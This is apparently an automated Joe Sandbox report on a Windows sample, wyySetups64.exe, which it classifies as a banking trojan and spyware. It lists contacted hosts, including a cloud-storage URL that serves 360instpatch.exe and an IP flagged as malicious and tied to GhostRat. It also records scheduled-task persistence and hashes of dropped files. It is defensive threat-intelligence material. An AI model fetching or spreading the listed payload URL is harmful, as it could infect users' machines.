                                                                                                                                                                https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exe0/wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://down.360safe.com/setup.exehttp://d360instpatch.exe, 00000009.00000002.1799520437.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#wyySetups64.exe, wyySetups64.exe.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://www.goodfont.co.kr360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://aka.ms/pscore6lBqqpowershell.exe, 00000006.00000002.1774677766.0000000005531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1765795867.0000000004838000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1765795867.0000000004825000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.typography.netD360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://www.galapagosdesign.com/staff/dennis.htm360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://g.live.com/odclientsettings/ProdV2edb.log.12.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://pinst.360.cn/360safe/h_inst.cab360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799585748.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://agd.p.360.cn36pData360instpatch.exe, 00000008.00000002.4118556728.00000000046D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://sfdw.360safe.com/safesetup_2000.exe360360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown

                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                              Public IPs

                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              39.156.85.201
                                                                                                                                                                              		unknownChina
                                                                                                                                                                              		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                                                                                                                                                              39.156.85.200
                                                                                                                                                                              		unknownChina
                                                                                                                                                                              		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                                                                                                                                                              1.192.136.135
                                                                                                                                                                              		unknownChina
                                                                                                                                                                              		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                                                              39.156.85.231
                                                                                                                                                                              		seupdate.360qhcdn.comChina
                                                                                                                                                                              		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                                                                                                                                                              180.163.251.230
                                                                                                                                                                              		s.360.cnChina
                                                                                                                                                                              		4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                                                                                                                                                              149.129.12.34
                                                                                                                                                                              		gwwifha84989.oss-ap-northeast-2.aliyuncs.comSingapore
                                                                                                                                                                              		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                              1.192.136.171
                                                                                                                                                                              		unknownChina
                                                                                                                                                                              		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                                                              8.46.123.189
                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                              		62713AS-PUBMATICUSfalse
                                                                                                                                                                              1.192.136.134
                                                                                                                                                                              		unknownChina
                                                                                                                                                                              		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                                                              1.192.136.133
                                                                                                                                                                              		unknownChina
                                                                                                                                                                              		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                                                              1.192.136.132
                                                                                                                                                                              		tr.p.360.cnChina
                                                                                                                                                                              		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                                                              1.192.136.170
                                                                                                                                                                              		st.p.360.cnChina
                                                                                                                                                                              		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                                                              118.107.44.219
                                                                                                                                                                              		unknownSingapore
                                                                                                                                                                              		64050BCPL-SGBGPNETGlobalASNSGtrue

                                                                                                                                                                              Private

                                                                                                                                                                              IP
                                                                                                                                                                              127.0.0.1

                                                                                                                                                                              General Information

                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1581895
                                                                                                                                                                              Start date and time:2024-12-29 09:01:05 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 11m 7s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:16
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:wyySetups64.exe
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal100.bank.troj.spyw.evad.winEXE@16/33@8/14
                                                                                                                                                                              EGA Information:
                                                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 82%
                                                                                                                                                                              • Number of executed functions: 321
                                                                                                                                                                              • Number of non-executed functions: 185
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                              Warnings

                                                                                                                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 52.149.20.212, 13.107.246.63
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 2008 because it is empty
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 3928 because it is empty
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                              Simulations

                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              03:02:05API Interceptor6x Sleep call for process: powershell.exe modified
                                                                                                                                                                              03:02:05API Interceptor2859077x Sleep call for process: wyySetups64.exe modified
                                                                                                                                                                              03:02:11API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                                                                              03:02:44API Interceptor6034982x Sleep call for process: 360instpatch.exe modified
                                                                                                                                                                              08:02:08Task SchedulerRun new task: .Net OneStart path: C:\Users\user\Downloads\360instpatch.exe

                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                              IPs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              1.192.136.170360#U6d4b#U901f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                A1FsbRkm5m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  118.107.44.219MEuu1a2o6n.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                    OdiHmn3pRK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      180.163.251.230_____NCM______2_10042231.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        _____NCM______2_10042231.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          Inst7__9510085.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            xaAKuXBlkn.apkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              A1FsbRkm5m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                149.129.12.34file.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                  https://sandisk2.oss-ap-northeast-2.aliyuncs.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    1.192.136.171360#U6d4b#U901f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      1.192.136.133360#U6d4b#U901f.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        s.360.cnhttps://ebaite.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 101.198.2.147
                                                                                                                                                                                                        https://www.imttolkent.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 171.13.14.66
                                                                                                                                                                                                        http://mylovelybluesky.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 171.8.167.89
                                                                                                                                                                                                        SecuriteInfo.com.Trojan.Click2.57467.3204.14689.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 171.8.167.89
                                                                                                                                                                                                        SecuriteInfo.com.Trojan.Click2.57467.3204.14689.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 171.13.14.66
                                                                                                                                                                                                        _____NCM______2_10042231.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 180.163.251.230
                                                                                                                                                                                                        _____NCM______2_10042231.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 180.163.251.230
                                                                                                                                                                                                        http://www.gourmethousemacau.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 171.8.167.89
                                                                                                                                                                                                        http://china.cnGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 101.198.2.147
                                                                                                                                                                                                        Inst7__9510085.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 180.163.251.231
                                                                                                                                                                                                        seupdate.360qhcdn.comA1FsbRkm5m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 111.13.65.25
                                                                                                                                                                                                        st.p.360.cnA1FsbRkm5m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 1.192.136.170
                                                                                                                                                                                                        agt.p.360.cnA1FsbRkm5m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 1.192.136.132

                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        CMNET-GDGuangdongMobileCommunicationCoLtdCNdb0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.150.97.30
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.151.161.150
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.135.228.168
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 36.169.144.160
                                                                                                                                                                                                        xd.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 112.28.62.4
                                                                                                                                                                                                        xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 117.183.45.215
                                                                                                                                                                                                        xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 221.183.165.41
                                                                                                                                                                                                        xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 36.167.111.22
                                                                                                                                                                                                        telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 36.184.46.9
                                                                                                                                                                                                        telnet.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 211.137.135.162
                                                                                                                                                                                                        CMNET-GDGuangdongMobileCommunicationCoLtdCNdb0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.150.97.30
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.151.161.150
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.135.228.168
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 36.169.144.160
                                                                                                                                                                                                        xd.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 112.28.62.4
                                                                                                                                                                                                        xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 117.183.45.215
                                                                                                                                                                                                        xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 221.183.165.41
                                                                                                                                                                                                        xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 36.167.111.22
                                                                                                                                                                                                        telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 36.184.46.9
                                                                                                                                                                                                        telnet.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 211.137.135.162
                                                                                                                                                                                                        CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 1.192.222.114
                                                                                                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                        • 1.192.240.164
                                                                                                                                                                                                        Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 1.192.222.117
                                                                                                                                                                                                        meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 1.192.193.56
                                                                                                                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 36.99.183.94
                                                                                                                                                                                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                        • 1.192.193.76
                                                                                                                                                                                                        la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 1.192.240.133
                                                                                                                                                                                                        m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                        • 36.99.33.202
                                                                                                                                                                                                        0aEXGHNxhO.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                        • 36.99.206.133
                                                                                                                                                                                                        chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 171.8.167.22
                                                                                                                                                                                                        CMNET-GDGuangdongMobileCommunicationCoLtdCNdb0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.150.97.30
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.151.161.150
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                        • 117.135.228.168
                                                                                                                                                                                                        db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 36.169.144.160
                                                                                                                                                                                                        xd.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 112.28.62.4
                                                                                                                                                                                                        xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 117.183.45.215
                                                                                                                                                                                                        xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 221.183.165.41
                                                                                                                                                                                                        xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 36.167.111.22
                                                                                                                                                                                                        telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 36.184.46.9
                                                                                                                                                                                                        telnet.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 211.137.135.162

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 149.129.12.34
                                                                                                                                                                                                        Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 149.129.12.34
                                                                                                                                                                                                        Gabriel-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                                                                                        • 149.129.12.34
                                                                                                                                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 149.129.12.34
                                                                                                                                                                                                        fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 149.129.12.34
                                                                                                                                                                                                        test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                        • 149.129.12.34
                                                                                                                                                                                                        tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 149.129.12.34
                                                                                                                                                                                                        soft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                                                                        • 149.129.12.34
                                                                                                                                                                                                        solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 149.129.12.34
                                                                                                                                                                                                        Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 149.129.12.34

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dllA1FsbRkm5m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dllA1FsbRkm5m.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            C:\Program Files (x86)\360\360Safe\{350AFA5A-DE93-44a5-980D-D55D415A843C}.tf

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38
                                                                                                                                                                                                            Entropy (8bit):2.715811782923715
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:AlmklUCctl:9k+ftl
                                                                                                                                                                                                            MD5:A5B51AD7AAA9622E1508A73C7F4F9B25
                                                                                                                                                                                                            SHA1:0092290121284CCFDB50DE5DA4785FA21E084E29
                                                                                                                                                                                                            SHA-256:E8790019319BD842CE2A690A833E213C0B5306462B9A33C08794E330EE0FE1FA
                                                                                                                                                                                                            SHA-512:44E2D4BA5BE5B824607960BFA7926E7AA7C7498482775AB09B2F3AAF875F2F51460010A7052E59BD27D144F3F85E7DAA40A0573B953A8C128B4A6AF69B37BC6B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:{.3.5.0.A.F.A.5.A.-.D.E.9.3.-.4.4.a.5.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.363788168458258
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                                                                                                                            MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                                                                                                                            SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                                                                                                                                            SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                                                                                                                            SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                            Entropy (8bit):1.3107262203267638
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrN:KooCEYhgYEL0In
                                                                                                                                                                                                            MD5:CE3EC02AFA060E7FEA188FF570456C44
                                                                                                                                                                                                            SHA1:607FB96901A4E588344B5BFF18A506BEBDFEA944
                                                                                                                                                                                                            SHA-256:9FA93E8110A3AB754CC6C14B8B58D8A0D5F6FDE241451C23D6330759BB28D435
                                                                                                                                                                                                            SHA-512:8796F06B248EF85E8B228EC1E3A2E58FA42D7E96CD28DFD304FA547AF3177BAA8BA370927FEC4EC12E435E140EA00B1ED0A5E1B862BBB45FF29C14BF5F7CC19E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0b4a0768, page size 16384, Windows version 10.0
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                            Entropy (8bit):0.4222349599198364
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:PSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Pazag03A2UrzJDO
                                                                                                                                                                                                            MD5:655028FDD23ED451E0397773E1BAC1A9
                                                                                                                                                                                                            SHA1:A88696C81528F8D8236E76F1E85CC463079B78AD
                                                                                                                                                                                                            SHA-256:C0D458121BEB24C17B6F49A29EFF3AA48AED0053A7F906321AA9E26CA3EA92B2
                                                                                                                                                                                                            SHA-512:6E6FF28B91577EBE48780E2F92AEEE4A2B390273FEC9D6F311764652E6BE325A0C82A4FC23F84AA6F2BC2F146E4C416AAA2456E17906866EF355FDA99ACCDB2F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.J.h... .......Y.......X\...;...{......................n.%..........|.......|..h.#..........|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................0@.......|..................N..y.....|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                            Entropy (8bit):0.07898751490061796
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:i1OetYeZKwMkZAtn3YzZ09zmthQAtAllOE/tlnl+/rTc:mrzZK7JtnIqmthJtApMP
                                                                                                                                                                                                            MD5:CA434AEA9BBD4A5CE59A4C33180C02C9
                                                                                                                                                                                                            SHA1:21C49D045CD539AC790EEE8753ACD3A2E0AE3C8E
                                                                                                                                                                                                            SHA-256:76CD290CA1FA00F5C2A9965D575C65FF54B8EBFF38387011F24A17A3C1FF943B
                                                                                                                                                                                                            SHA-512:CD719F4A1616A36E4065B8F1CA4C34DCE9731F1BDD21284D72D9FF330EBD5B33EF49967DE7D0E0A776A119CEB37C088B53655EBB9A3A6DA69DD3A1112251D944
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:5.@......................................;...{.......|.......|...............|.......|....7.....|..................N..y.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\360instpatch[1].exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4118496
                                                                                                                                                                                                            Entropy (8bit):7.743814085153487
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                                                                                                                                            MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                            SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                                                                                                                                            SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                                                                                                                                            SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 17%
